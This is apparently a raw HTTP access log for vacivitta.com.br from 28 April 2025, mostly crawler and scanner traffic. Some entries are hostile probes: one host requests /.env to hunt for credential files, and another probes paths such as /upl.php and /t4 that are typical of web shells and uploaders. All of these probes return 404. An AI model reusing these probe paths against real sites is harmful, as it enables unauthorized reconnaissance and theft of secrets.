82.78.237.173 - - [28/Apr/2025:17:31:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
87.236.176.141 - - [28/Apr/2025:17:43:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
vacivitta.com.br:80
185.247.137.241 - - [28/Apr/2025:17:43:22 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:17:48:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [28/Apr/2025:17:55:00 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:17:55:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:17:56:10 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:17:56:38 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:17:56:39 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:18:03:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:18:14:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
121.105.120.206 - - [28/Apr/2025:18:17:05 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
49.51.52.250 - - [28/Apr/2025:18:22:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:18:24:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:18:24:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:52 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:52 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:53 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:53 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:54 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:54 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
